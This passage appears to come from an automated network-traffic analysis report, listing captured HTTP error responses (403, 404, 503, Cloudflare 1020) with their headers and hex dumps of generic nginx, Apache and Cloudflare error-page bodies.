2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Oct 2023 13:51:09 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 246X-Sorting-Hat-ShopId: 9394790Server-Timing: processing;dur=9X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-us-west2,gcp-us-central1,gcp-us-central1X-Request-ID: f8da424a-a6dc-4bb3-8cfb-e6796140f00aCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9kNzjIHzvY2KRK2MRstn74NpPFv0f169aCosZEOI1B1xDjq6KXC2k0MOnJ%2B1JrZr%2BfjCdog4uOJAXj6s%2BnIE247Dhy%2BaurTybdKqem8et5ILKbBTKjHXBrRSM8tn"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=83.000183Server: cloudflareCF-RAY: 813718c0dd932f08-LAXalt-svc: h3=":443"; ma=86400
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:51:09 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Thu, 12 Aug 2021 07:53:38 GMTAccept-Ranges: bytesContent-Length: 15513Vary: Accept-Encoding,User-AgentKeep-Alive: timeout=5, max=100Content-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 50 6c 61 63 65 20 66 61 76 69 63 6f 6e 2e 69 63 6f 20 61 6e 64 20 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 20 69 6e 20 74 68 65 20 72 6f 6f 74 20 64 69 72 65 63 74 6f 72 79 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 62 61 73 65 20 63 73 73 20 73 74 79 6c 65 73 2d 2d 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 20 20 20 2e 70 69 63 6e 6f 74 65 20 7b 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 20 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 3b 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 3b 20 7d 0a 09 09 20 20 20 2e 61 72 72 6f 77 20 7b 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 34 65 6d 3b 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 30 70 78 3b 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 34 65 6d 3b 7d 0a 20 20 20 20 20 20 20 2e 6c 6f 67 69 6e 2d 70 61 67 65 20 2e 6c 6f 67 69 6e 2d 77 72 61 70 70 65 72 20 66 6f 72 6d 20 7b 20 77 69 64 74 68 3a 20 37 39 30 70 78 3b 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 20 32 30 70 78 20 32 30 70 78 20 32 30 70 78 3b 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 7d 0a 20 0a 20 20 20 20 20 20 20 2e 68 65 61 64 65 72 74 65 78 74 20 7b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 30 70 78 20 7d 0a 09 09 20 20 20 2e 73 74 61 74 65 69 63 6f 6e 20 7b 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: nginxDate: Mon, 09 Oct 2023 13:51:09 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedX-Powered-By: PHP/8.2.9Pragma: no-cacheCache-Control: no-cache, must-revalidate, private, max-age=0Expires: Sat, 26 Jul 1997 05:00:00 GMTRetry-After: 3600Data Raw: 34 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 74 69 74 6c 65 3e 59 6f 75 72 20 61 63 63 65 73 73 20 74 6f 20 74 68 69 73 20 73 69 74 65 20 68 61 73 20 62 65 65 6e 20 6c 69 6d 69 74 65 64 20 62 79 20 74 68 65 20 73 69 74 65 20 6f 77 6e 65 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 38 37 35 72 65 6d 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 33 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 7d 0a 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 7d 0a 0a 09 09 61 20 7b 0a 09 09 09 63 6f 6c 6f 72 3a 23 30 30 37 30 39 65 3b 0a 09 09 7d 0a 0a 09 09 68 31 2c 20 68 32 2c 20 68 33 2c 20 68 34 2c 20 68 35 2c 20 68 36 20 7b 0a 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 3b 0a 09 09 7d 0a 0a 09 09 68 31 2c 20 2e 68 31 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 72 65 6d 3b 20 7d 0a 09 09 68 32 2c 20 2e 68 32 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 35 72 65 6d 3b 20 7d 0a 09 09 68 33 2c 20 2e 68 33 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 35 72 65 6d 3b 20 7d 0a 09 09 68 34 2c 20 2e 68 34 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 72 65 6d 3b 20 7d 0a 09 09 68 35 2c 20 2e 68 35 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 38 37 35 72 65 6d 3b 20 7d 0a 09 09 68 36 2c 20 2e 68 36 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 37 35 72 65 6d 3b 20 7d 0a 0a 09 09 68 31 2c 20 68 32 2c 20 68 33 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 30 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 7d 0a 09 09 68 34 2c 20 68 35 2c 20 68 36 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 30 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 7d 0a 0a 09 09 2e 77 66 2d 62 74 6e 20 7b 0a 09 09 09 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 3b 0a 09 09 09 66 6f 6e 74 2d 77 65 69 67
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:51:09 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveX-Seen-By: HXR2QYc2XBOIxYXpEjCVHw==,m0j2EEknGIVUW/liY8BLLuuWLGLAwvTMYA8ArAuxUdgm++C2XkuTvnlRFg2XiSDLX-Wix-Request-Id: 1696859469.8423167266733224426X-Content-Type-Options: nosniffData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:51:10 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uGzZSCfKqZYeF0UuDO46FY5KpiIqquXgFLoJT9AaOGx6cpLM%2FigzOxOP8cquLqwHymiEp%2FhZkJPWyRJuP0zl4q0G3dUU9AfR%2F7ZSS1%2B9D2aBxcDbGAn4saC0JLc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 813718cabcee0ffd-LAXalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 09 Oct 2023 13:51:10 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:51:11 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SsXUXOUgdo1360pgG5d5m3FoRL%2BDe4exIt%2BsS2TAhlb9SQlsY1aBxNn2UAAbTrYVDAkWqcSKVPCpHxtcflbkwmCp9u3QmAROtyFo0XOEB%2FPv3OQUBj3CGpCGevQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 813718cf890e0ffd-LAXalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 09 Oct 2023 13:51:11 GMTContent-Type: text/htmlContent-Length: 2843Connection: keep-aliveVary: Accept-EncodingLast-Modified: Thu, 26 Jul 2018 17:13:08 GMTETag: "b1b-571ea1be9f445"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:51:11 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 199Connection: keep-aliveServer: ApacheX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Mon, 09 Oct 2023 13:51:11 GMTcontent-type: text/html; charset=iso-8859-1content-length: 199server: Apachex-iplb-request-id: 66819144:E7E0_D5BA2110:0050_6524054F_84C2:2C3B4x-iplb-instance: 28103Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Oct 2023 13:51:12 GMTContent-Type: text/htmlContent-Length: 19268Connection: keep-aliveServer: ApacheLast-Modified: Fri, 13 May 2022 08:04:11 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 